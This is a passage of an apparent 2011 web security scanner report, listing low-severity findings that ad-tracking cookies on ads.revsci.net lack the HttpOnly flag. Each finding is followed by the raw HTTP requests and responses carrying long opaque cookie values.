BO7FittJCdPVYj0uPOeB3Zii5YU6lIciVFSUPcjpD0ZE/qD91uUe2X1yUB/ZDmmlTIll6MqI4RVeseib6AMwY3QXEsGDlZjdpTvkEAYh5cgNStkIGEWSdvDe1ddhjbPviuUwLk3Z4BSCCi8vYQXJ7wnO1TX98vMjmxMGHIkLu0JAdfc+nc3yo3ecvTBAZ4YFacNNVkkOgeYagHMJTcQVP4eD4iBSRsikTKKVit5yOvbvvFzvYrmR7xB/59eNRwl9+TYhab3V9P8Duyapv/ffe06hPnVbSAFh7+FkWRUQQE6g=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 01:13:48 GMT

GIF89a.............!.......,...........D..;
13.26. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=4298BE5B089CBB1E55E7A69A4E062327&rsi_site=BCE6C348CDB3347A37A6E9503B9F4896&rsi_event=3E8A9FCC69C70348C54F8308F5EEBF2B HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&browse_products=91637&fb_key=undefined%20Fields%20of%20Europe%20for%20Spring
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF5ENBeXIMpzax3xDh/u74svh4rycdP0dAKlgosDQtsveKPUAbV6eJooUUZKyvzikWhXHnKlCMkZbB9/VH60YJGPxFnajuGncuM/dM/Uh51xPHRNkiKQlkFzeExmUiyCHp+JZor9oPRzZI0Mbu6KYqeA1IFSCpVac+IHlYHQGyWu5ISmDl59BKT6swEf9AkfwNDDGhkWPwbnVyhZyB1WbtdCNOgL1rLo31JmKhop80U9r9+w7gbPBUqdi6+aNOCntxXGEa0lT+AOh+9OmV2I5Yi+DkYM3YMd3xb2omk+SKbfwlcWpm1VDYZX6/5kh5fJXyQ0UuyTsjW0JuXe81b8+eIYhrcWsU5BhKZRNIMTtdY+xejMckEvxn9o2P/m3ieDJIm0I9cQrZSZNRQDVHBMxU2xxjy5ZGBdqmuzGNq9UM71skeHbQ22x5ql389tzqH5qIR0+2BtDJC3TVoXS7O5QjXrolunrjwuyTfiDVLYSK9FFxIlC9z+BchyFW97A0vl9EZfAu44kUi3twGM/yf01GWw==; rtc_0s-X=MLvntzM1ZwprJ5GrFviWjmmgATvMNHGJjojTTrWSZIpIFNkgDw/K4gucx48Ansn8gFdhbSFjRTa6QTj/I+16qFvFR8txZ3XhW+h/MeB/oGJTuWd71KWU93xLd4iO2rbczqqb71ITWUbp6EX0wNdtopvMxVqaM1JqYfNKs97ZtBaRULM0PwDcs+nUakr6T4pQ6ZAhwqqC8M5QeQgL3Mwz/l/LO7TuRHS3DG/WEBaa4GMZypMTtieoEqNYKS5uaQdc9YsZ/I7stOdJLd7Hv2XYRUoNtaop227HsWyGbHxMn003mjucGc0mruqE+6DHP6brM6nM6x/tn7oZ2DjdBMJUOZiv9xqjlXnqcVjrB3kXcNTeDq09E5IMKoYrVJlZkK6uobYwka3tRmxkmifKh23k49KG9Bf6S2yRaNGnAYLK+zm7JATIxubd282sNX+n1154JTW43J8wLUy5/9w1/V1bn+LfnLjopCoy5O0KIgr5+yVcorYv+yTBZ8FhgCJA+Q8QvQjH/z6qkFkkgV2Pc0Qu8ePOuvk8qolmk5a5cRl/uMAl5d1L5fAWohFKLmeKHnIc1teXHxZ62z3xlAPoH3vSe3gvL1dmnj44UotfcgD9gjypLg/DU9uqsl/Rdd2M4KoI4aNAtW2PewAt7/uqPhIVZ2lA67g753Fs+YYdF+aGv8uJwGCyFeT/2FR7o49m55h8Gwxj243dmAFbzNMgnnyKGgxLPowo3XlGRBBhnfGcjmQaduyakw2Situk66TlalCm1TQvRzzJbNCx+dssYOfOQB0bbtJ2ntUVoY0/MWG+7X9mFMcU0K1YsXlTv3JLgSG9szKwKoXeXI5nGPmexJQamIZZRu75FQen7qI5XVSM/FyhyjLG6RJHjFKcgLVTWbop0qonwtOz+dRaa+XzimvUgmjE/LsOByg4WyNecM6WuqsLzQSwbwkJu6ayeu/z8NTC7c0uuc9GN4iMyZ0VRwyeREtwXmyzI9BFcLyZ3Rs4ivUj2RjCjvtSsNNRHe2053cF2Vi66vu8vK0TwhhQ+4nNefilYUbTA6wV1dbQtthV8yc5tkCS4xO8RM2JqwjJ+2RL0MnC0HJ4Sa9kFkqhq5GF29eaWIKbJnhrkHmZYVI20kuZatlwGXCzd05n7WE/cFig6PF+oHMyVEvg3H2Geqve6dtrbR5/nlqFYJUJmU1LO9t6E30Vexgt/OqPCKtq5Buy0heNFn43D/XEPUM075oPE41B7rGtcoZLDHSX5xusWqM7Xz3Yy0rj1w/OGBhEfzOXP0tA8vgBAjPNzEOqo9q4g3TV0zqIlK03g3UEsVsKd8lrYh6vves5TCqBe0HeDGyLF1ZryuAIiKWwjLAn92Tu49HaCCp5ZapUWKSIpxW6EBmQA4m6a+VSTrtsZqZKuqbIAMmb6Z5nlEJ0CvScdpzM8bELtNupCMCENC4+mcWsy8PXof63WNfpjPhyWcxL6XPwO+XIvL1yoRu187rFg4rnh0OUfdRdE7b+DsMlXGSWyiWEOb7KYoa7LZDfbPfYMXY=; rsiPus_8M_3="MLsXrqMOJjhv5pB0GuK8L0HP6TxvTFfsq5kDvElXUq9TwKhTQq2Ubnlep6FA0C8r6htCP2PSMq515hwVRH+xujb+G1htaTXszdeYeilTKKO1RBpCQ0t0e2bIMKUlM6bClRwGcxa+rMOmPp+zucy3NXWBXF98hg0FKNucuRxIwwaBqYDZc6gnhLN9X4uRT1JhPmDtba7wb1Ny0LW1ZiGWsLWEcpgifGwVEE5eaMuOG08OuIdls6ej9CGChzNgtGsTz2fAmDRoIO7NRmVGO2Fu0NmIJaCq7dRuHscaTiC32VFYaA+rHHFt2+c5dlmsE3GVMKlrsnqqSWAF0XEbT2iXL29pLdhi4J90vyDRyP5v7MXOQ2SnexhjoTI5feC3ziZujOSKbuHw0UZzk0vKfGo2UI5kqXNXbmSsPn/zT4VYlQl3qI1tr+mET3Lk9JcNnCeolcuo4nIUc2MVAWhQju5cRXdKnK346bdbLyeu8iNlZNnzOXbRFRhJZ76I+GGWQpAXJN3wVH7fm4hpae41QS4ebXx2GAiSPiFanMRGgxk1KKyk1R9inDRhNoP+NEFnk4QCIn0xHXRkmHQxFNYR16es6aFmKW0aXwrfjh/SleuLcnNVOtmkxOqqySqyGprAvdvjNPMG6OSZC+mmHMulB/MVrHv+J4VtHZPz4w/D7w00KwgJ9/gt0igYOwCqs7sTKGjscJmbv5uKi1CLBZ30Eert2NaeyUoIBxi2ZcULwt/pNT+BN4X/jzNpqtAsS2eWt+6k+t1yjORdslvobLE5uBgu+QoIj9KoAI/xn5tbSJNbh/pqDYFgbWX6rn8LBlqlhvNirM2Iac8nZobH2ruya7LtRtlAMmYS8q2hdLyVG/f3NGmzPJFmiflLeVXcvRJm9fM+C44nvTf3dth3bO0BRTJJRm1xoSl46U/Jt/klHQfgwwR9piSC4JNxvNN8mx9N0NDk5r1u1PzRR8T7hTV3g2qe8NSmVo7wBTml4xNMgbY+g8FGDaZ4l+tgQR7HDojsJ8vv5P8akjydW4FTJxg="; rsi_us_1000000="pUM9IzlDOAYc1U2ENgyhQng1Be7z7sLKw3jzv8rD7yutq5CDQ0Q8aZKAy3gHZduyW7zv43bzfN67P/5NzyurwWondhYeen7CWIWgxbqCdmY3a4wLoRcc/Reee8KNhj4BKp/euTN0DtKguTSkIDJ1vURStfWhCx5vdVhSw4H7sbZeLBt7cLZmC4R4RZG7fRG9H8EygB0KjrtgkS5/khqQTfWqMN+CQ7Re6dOsKbW6QCZw8Dy0JZ2jJgBRRN67npYQXY032n3+oCQ3q612E1CGsBQiuqZsfA5dZoy+uIW5D/D0r/XwM9wGw7l8HY0p4cwTPS7esM3w5lbCklgt/yNLi8Ih4fiXI7Kt2ZkX7dRZ8f8wICWkrpK2Tyqz9lk8gjR0ud3Njd4DLEQYQ52MTXD/E8REHhIOJSQiiGx50SD9yT9a5K72SQ9s6UpKFIYHCjsW0XJfDiR3UsJK+8WYg/VZOgiFw7QPdBC2+b/LiFDN627XlM3IUocsS1co3tAWOBD+rhB7D7TzR2PQGhc7PnHKe5+pg4ay4m/MuURvgG7SG6kmVhSHwZtzPCtXe9nVJwwwqzpGdKp/JcVvqe1cR+AO9nk+pZTXEGB2RR8cakFnhvB+5QR/xTMLSr1QnREn5KuWpPBdmk8ldJd6zXxtBO7Tkv97Z/BtuApaw7WZiT1IMop1RwvMrd+pw054zxi4C+4/HCdkcdis4luyl92Y1SpKqfV1PzoiVwa24vHOm917syTpes+2sYgv3uTbICeM9/Kj4fRDls47jiyDeFhZZBL5pnaLvuwzkq+KlywCU6mHoBjaCbAPlF65eyavgRSySOAWUWo/fQKkSGdsNC2QzBtlF0zyE6T2FrNMt16Pw9l+yFaLlbt0tXHwsqBkzuZWx3y0C3if2kww3wr+Z+JovuWA6Z8M1/r9DCXyrPTIVh9T9incB64/hgqfDK0QL013XAcR2XOJyAAA5vFdniF49hWrT8fR9uOV9c+kzEPBXwcXL0OMdVMUbcPkqnk+kVar3aG0PayeJwXSzuCI2pgzWkLtYs26LeQYLxmsjjHs7vcBGSpavo22HaEjA1ba4DaWCB+bFr3k7XVpbB5qwpNHRkCkZ77/UBJv01pt4XC4DAkfk3Ez7bHArrmb2X25X/l2iGpuYTDqCuAeR1whZ1F0erqLBzvaSriTPduUpkzo8ILLpKXx2R2HDOei+clQOMxb0cM3b4j2LoecLbdBeykr1KInZlRj+7F9LQMTvAHxlfg3BY6u/iHTp0QEKNmfkGRZdVhLGvY7Goafa2yt/lBjKcISAa/c80uQzhksgH6pF0cmHfqP2P02qSFNz6eMJ74hVELzN5l4DAgFOGEv7Yff4YzdAI7OC5bP5U6iQDkFclbNcZuLB/28xD4b5YEtGy2QydMcWl8nIT18I/9KHFpZKfmBXkImm6gFbB2MudKZEtB76izQuckAgZVlJ4V5t9qhXF62TO6EdyPnwlW0lCD85YsJI7JgNDWC95j/iAx5W/1ydJH20DePSoJcp093rdAxL/ln"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8M_3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_T3XK="MLsXsqMOripv5xAx2qUcbOIFXR49nM7gHaaGHJKwjQ4IWUcwRphvL8FGdQFLYanC2g9+vTMnyajWtnUbDLMqFPpzLar1wRUIvTGA1uWnfMxyPi99psiNguZT0ea7goHFAR0vX+MQDo54WHIdan+1NeFoKix3snMEHl+VGp6M8XYJj94/03HafRLM2onf1ijEcEkm1/1n/1Voa/Tniz8v5UzWtTOUs5kNcXyd/GxQIVpAwIv6viRMVBPkZdyRACLIEgQUatuVt2Ae3zpe4GOSEjEewrdAUMcRXGXLX70n5i8b9Sv0u97iVrKhlC1xnKQQe5a6sPRlFtqOPMDy3BAiv7EFewMVg8ZPzU7cYMCPBklkv4ntKcK+SH+M+tkUZ/3XElsh2L8ZU+CtExNsv4D9d5ft2sUsmciS+HjMXx4cZb+KFUlxjiT8Rq76Orly4jRJI1+eu6Xnk0EGbYU4IUvgyWIyE5O/F/Vtl5oLf1yhSkGGnAz0YGmIQhOHu7uHLJGD9sgs3xaUDCaYROcKp2d95WhIHyk5XJU1VXNLXgAGrIF0t2hhF4Nt15p2XXGLy5gTwI4huWfe6hJ3VvEBAbOZgkkSDAbY/CE+HdAThs8rnN2HtnEi6wyH6YHWZFILAAWVzIEIlpXu4B9LFNs3NCffLeZGWyerzHFRBn3R2qGLoeSyx+aEw1c5DZA8cyVRQhjZGRYz/TZoAmSEo8GcUNKSiCzEngwZz8P3BtMUYysYM33pD3UKh2NIRTcIvdzeakhX05g/PMtvuHdkTzF4Z0z73WMnTuvcxgoxvtgJlIKXwpzeQO5rW3Dt4sjv8T5n4+zwEg7geTRijjkhb8+2OUUyOPl1ql5SVAR2wzJfUysu1ohjnNTT8CW6m4gb+Wdv1NW2o61rZnglOzK8qhMK0sMpNOvwYqTK4nGlTD0lVG/c5/xjEXtpGILTikdb7674u1J8tB9dhWLnbh4o1D91MzBa3PICDi8A9QHgh45kjFwn93+FC67NCFtGwGZmdI8lePrctV6ymrZSkIDwmq1pwnf9oIzoU9pb6u4mlNnCQGrYeDKqCDtkmUfDZhxEoW+iT0erbDN2xct7ks1KhZB5GJWXdo7WBoQ="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUNNIz9DOAYU1O2W4w6hQni19TpnjEhJR5tpcRY9E+cX+IMnrLQbh8YgXvUvfVOUwUlBtexVpQptyt0WjZvcpGgF9DrAwz3bmQ7kBMeochVw+NcsTyWdIl6bZ1ijruIPGpOOjUOAqaTjhMSvjtr7FNI0UD4r+nDEOLX2Ns14VtgL9v0quPNoZ0Y6FUAxSZUSF0CrmqRKdJ4/1cSVWynKvNy1VQIk6VztqCWfhxqP3qmkR9Hs39oSK2ZziFzzuezxL2RWBeCWVCehsbIjFz/Oprb0Cj6ZwI6sl+2FxEajwbw48lkRdLBbPzNIhVV/jiYJPUIW7X/v75FNHJnsitb8UcPy1z5hKvkE6KdZ0BHROXI3x/Xw3UH2mncF3SxbpOP7Zft4RYTlkAmKcqMS+cdWZ32/1huyXx7NfqctB7AAv87fNfQ8vrdwIpOGfTnpuuh7qlnmBZ2izMISFWX0ZebTb3QPFE7lFvYF3SKZfhkQlQ4XL1myJJ70E2cWE993JUtCR4ZSDzI5iL1ULHXBilqhAGCc5rqD4ahZuhmuhUR03Ai0bAiuIyJypQOIDbdngf/tIRczlpfN/CXCUORMc3NeWJaJP5qWYFWg1fNsEDJ0HpYR1+FdkZiECqLEMK2mPOTB1wtpSDQtoyBeJ2xmALC0mWV84ovLFzgvA4jqVADqQ1hd/JVlGS1FCFeXyONDLmsRjRoaTQptvfeDADZjfnyHf6lRUhwizlcc89ptJAoSVzlbtOXIqeenggNX40qMI7rXbc2BxYFveNmgFDHak3Uv1aahWQUTA37C+/jHID6QBEXvvXL38cgHFdC0+wRBE1/aELPHH6R4iMUPCYDRnuBB7vb4bw8EkraqsFwTCQuECl9FE+xV5gwdL+Zs43PrB8Wbzo32CFjasjNqoLC4uGfrDe3/4OILomh2R7O0wqTgfeQqm7U7MZWjGEQax9tHfZ9cjVmQ2luC27SJVuBpsVgTENVuoPj9sPHf6qy9vpm8naTbKqxVW1cAMIIBLCu+K0hZgKd0wOfnXIPT/o3L5/BDJasT/zE834nGQZEiDMc73DBSMHmvFhhUtPQ7soriuEWCSUEc/3mlWlE6lJa6W+vpPOylHMLQhtRi/k4+QS4b/T2qzfkrXtPM7EOX8E5kcpZ4lhBn3qSU6YMMRWRcnnA15kkxMLL/xv2KuTSep6VDcJ1etS9yehfCU95Fn+6BzaTum6oXu+Baoj6nj+jCThDP24eQcG7J6668Q5C5V9ioIby6Z/2pVWym5N7y2cebaVvAYsvkmyhtvak+KMh7/swxcXXOUc6qT9Vzg0o3Eyge2ar2pSwRwgRF8QiRwgoqc8987XJG7URWAXkE/B2QGaa7NutREe5TZgGZNllTWJMpmqkf5AON5gNY68a/yDZ14hoBw71my+477TqW2pu98Z4yDfMo2rJ8MZjunQYlFN4U7QIqlDYhZW5/M1MOvSIKswzkdwx668cmcpSF7EOIEQZ6nUJ4Lhe5mWoMFg6V+LP6ov9QGG8NX9p5lXhgu2ay1+i8CdQEYk/zO2tVzfbCsKSb5fMgzCHFihXVXVM="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=987677&t=2
Content-Length: 0
Date: Mon, 09 May 2011 01:09:50 GMT

13.27. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&type=gif&csid=K10145 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305608&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsiPus_8M_3="MLsXrqMOJjhv5pB0GuK8L0HP6TxvTFfsq5kDvElXUq9TwKhTQq2Ubnlep6FA0C8r6htCP2PSMq515hwVRH+xujb+G1htaTXszdeYeilTKKO1RBpCQ0t0e2bIMKUlM6bClRwGcxa+rMOmPp+zucy3NXWBXF98hg0FKNucuRxIwwaBqYDZc6gnhLN9X4uRT1JhPmDtba7wb1Ny0LW1ZiGWsLWEcpgifGwVEE5eaMuOG08OuIdls6ej9CGChzNgtGsTz2fAmDRoIO7NRmVGO2Fu0NmIJaCq7dRuHscaTiC32VFYaA+rHHFt2+c5dlmsE3GVMKlrsnqqSWAF0XEbT2iXL29pLdhi4J90vyDRyP5v7MXOQ2SnexhjoTI5feC3ziZujOSKbuHw0UZzk0vKfGo2UI5kqXNXbmSsPn/zT4VYlQl3qI1tr+mET3Lk9JcNnCeolcuo4nIUc2MVAWhQju5cRXdKnK346bdbLyeu8iNlZNnzOXbRFRhJZ76I+GGWQpAXJN3wVH7fm4hpae41QS4ebXx2GAiSPiFanMRGgxk1KKyk1R9inDRhNoP+NEFnk4QCIn0xHXRkmHQxFNYR16es6aFmKW0aXwrfjh/SleuLcnNVOtmkxOqqySqyGprAvdvjNPMG6OSZC+mmHMulB/MVrHv+J4VtHZPz4w/D7w00KwgJ9/gt0igYOwCqs7sTKGjscJmbv5uKi1CLBZ30Eert2NaeyUoIBxi2ZcULwt/pNT+BN4X/jzNpqtAsS2eWt+6k+t1yjORdslvobLE5uBgu+QoIj9KoAI/xn5tbSJNbh/pqDYFgbWX6rn8LBlqlhvNirM2Iac8nZobH2ruya7LtRtlAMmYS8q2hdLyVG/f3NGmzPJFmiflLeVXcvRJm9fM+C44nvTf3dth3bO0BRTJJRm1xoSl46U/Jt/klHQfgwwR9piSC4JNxvNN8mx9N0NDk5r1u1PzRR8T7hTV3g2qe8NSmVo7wBTml4xNMgbY+g8FGDaZ4l+tgQR7HDojsJ8vv5P8akjydW4FTJxg="; rsi_us_1000000="pUM9IzlDOAYc1U2ENgyhQng1Be7z7sLKw3jzv8rD7yutq5CDQ0Q8aZKAy3gHZduyW7zv43bzfN67P/5NzyurwWondhYeen7CWIWgxbqCdmY3a4wLoRcc/Reee8KNhj4BKp/euTN0DtKguTSkIDJ1vURStfWhCx5vdVhSw4H7sbZeLBt7cLZmC4R4RZG7fRG9H8EygB0KjrtgkS5/khqQTfWqMN+CQ7Re6dOsKbW6QCZw8Dy0JZ2jJgBRRN67npYQXY032n3+oCQ3q612E1CGsBQiuqZsfA5dZoy+uIW5D/D0r/XwM9wGw7l8HY0p4cwTPS7esM3w5lbCklgt/yNLi8Ih4fiXI7Kt2ZkX7dRZ8f8wICWkrpK2Tyqz9lk8gjR0ud3Njd4DLEQYQ52MTXD/E8REHhIOJSQiiGx50SD9yT9a5K72SQ9s6UpKFIYHCjsW0XJfDiR3UsJK+8WYg/VZOgiFw7QPdBC2+b/LiFDN627XlM3IUocsS1co3tAWOBD+rhB7D7TzR2PQGhc7PnHKe5+pg4ay4m/MuURvgG7SG6kmVhSHwZtzPCtXe9nVJwwwqzpGdKp/JcVvqe1cR+AO9nk+pZTXEGB2RR8cakFnhvB+5QR/xTMLSr1QnREn5KuWpPBdmk8ldJd6zXxtBO7Tkv97Z/BtuApaw7WZiT1IMop1RwvMrd+pw054zxi4C+4/HCdkcdis4luyl92Y1SpKqfV1PzoiVwa24vHOm917syTpes+2sYgv3uTbICeM9/Kj4fRDls47jiyDeFhZZBL5pnaLvuwzkq+KlywCU6mHoBjaCbAPlF65eyavgRSySOAWUWo/fQKkSGdsNC2QzBtlF0zyE6T2FrNMt16Pw9l+yFaLlbt0tXHwsqBkzuZWx3y0C3if2kww3wr+Z+JovuWA6Z8M1/r9DCXyr